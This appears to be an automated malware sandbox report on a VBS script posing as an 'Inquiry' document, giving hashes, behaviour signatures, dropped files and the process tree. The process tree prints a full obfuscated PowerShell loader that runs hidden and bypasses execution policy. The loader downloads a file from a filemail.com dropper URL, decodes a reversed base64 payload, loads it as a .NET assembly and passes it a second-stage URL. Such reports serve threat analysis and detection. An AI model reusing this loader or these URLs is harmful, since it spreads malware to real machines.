Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    10-11-2024 06:22

General

  • Target

    Inquiry HA-22-28199 22-077.vbs

  • Size

    12KB

  • MD5

    605abed3e1d7266ea35c8517b5961010

  • SHA1

    4c35a1a9e7385b8216812f3c6ff73b23b1710d18

  • SHA256

    394ce0420dc3786db150a630ceb90bac466bf4a3c3f1f792441fed6fb0b6dc34

  • SHA512

    15ff74ef09974c51a36cd4197c45c3391dd76317c2d278a34c9df5adf3cbee41f6fc9cf25450d73f3e6f4e63f00c0e65d874f6b572421bf49611544d11467bbc

  • SSDEEP

    192:bWyKzktunJRUyKzktJDlvgia0GONzU09iT0yFnVk03u3A/WeFW9tWHaFi:Cy44unfUy44dPlzNiKeFsin

Score
10/10

Malware Config

Extracted

Language
ps1

URLs

ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Inquiry HA-22-28199 22-077.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2088
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CKguwyMRrmjEg.js"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of WriteProcessMemory
      PID:2752
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2608
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "invoke-EXPRESsiOn (('eDyimageUrl = E5rhttps://1017.filemail.com/ap'+'i/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcO'+'c_T35w&pk_vid=fd4f614bb20'+'9c62c1'+'730945176a0904f E5r;eD'+'ywebClient = New-Object System.Net.WebClient;eDyimageBytes = eDywebClient.DownloadData(eDyimageUrl);eDyimageText = [System.Text.Encod'+'ing'+']::UTF8.GetString(eDyimageBytes);eDystartFlag = E5r<<BASE64_START>>E5r;eDyendFlag = E5r<<BASE64_END>>E5r;eDystartInd'+'ex = eDyimageText.IndexOf(eDystartFlag);eDyendIndex = eDyimageText.I'+'ndexOf(eDyendFlag);eDysta'+'rtIndex -ge 0 -and'+' eDyendIndex -gt '+'e'+'DystartIndex;eDystartIndex += eDystartFlag.Length;eDybase64Length = eDyendIndex - eDystartIndex;eDybase64Command = e'+'DyimageT'+'ext.Substring(eDystartIndex, eDybase64Length);eDybase64Reversed = -join (eDy'+'base64Command.ToCharArray() qZG ForEach-Object { eDy_ })[-1..-(eDybase64Command.Length)];eD'+'yc'+'ommandBytes = [System.Convert]::FromBase64'+'String(eDybas'+'e64Reversed);eDyloadedAssembly = [System.Reflection.'+'Assembly]::Load(eDycommandBytes);eDyvaiMethod = [dnlib.IO.'+'Home].GetMethod(E5rVAIE5'+'r);'+'eDyvaiMethod.Invoke(eDynull, @(E5rtxt.dstep/pop/ue.prgxamygrene.gig//:ptthE5r, E5rdesativadoE5r, E5rdesativadoE5r, E5rdesativadoE5r, E5rdesativadoE5r, E5'+'r1E5r, E5rOneDriveSetupE5r,E5rdesativadoE5r, '+'E5rd'+'esativadoE5r,E5rdesativadoE5r,E5rdesativadoE5r,E5rdesativadoE5r,E5r1E5r,E5rdesativadoE5r));').RePLaCe(([CHAR]69+[CHAR]53+[CHAR]114),[sTriNg][CHAR]39).RePLaCe('qZG',[sTriNg][CHAR]124).RePLaCe(([CHAR]101+[CHAR]68+[CHAR]121),'$'))"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2768


Downloads

  • C:\Users\Admin\AppData\Roaming\CKguwyMRrmjEg.js

    Filesize

    1KB

    MD5

    ae40e08c0cba583f183151e7917d4947

    SHA1

    79bb3dd394e12d1e598b118ca29e60ad4eeb93b3

    SHA256

    b43098cd18ce70e863d2bf5807ea36f95e03c5128ed2442f5886ea4ed4c6927c

    SHA512

    5b4650fafda18f1fa194f4a0d0f30d8e06cfd86788852a47f7b105119da270206af389b034e47637e9eb21962645505ef9fb2645fbd42be775001cfa557ad598

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8F9A8R71UV3GSZ4RE4NQ.temp

    Filesize

    7KB

    MD5

    ec34e07bf983f9e9d692544fb8d8439b

    SHA1

    422128d4c7ef24c7eab864eb6ff939a595179337

    SHA256

    a40ac2f9c61a8f9a329328d6823f68d337335235c33f267d8368b471b16d3e50

    SHA512

    34719ed2d949d5f2ded8da37aef24f0ee7f6f2b72eab88974d31233a3a1badb62c316756ec8da26c5be4fed4242d795d9971fe756104010fdd3f0a141b035487

  • memory/2608-8-0x000000001B620000-0x000000001B902000-memory.dmp

    Filesize

    2.9MB

  • memory/2608-9-0x0000000001E80000-0x0000000001E88000-memory.dmp

    Filesize

    32KB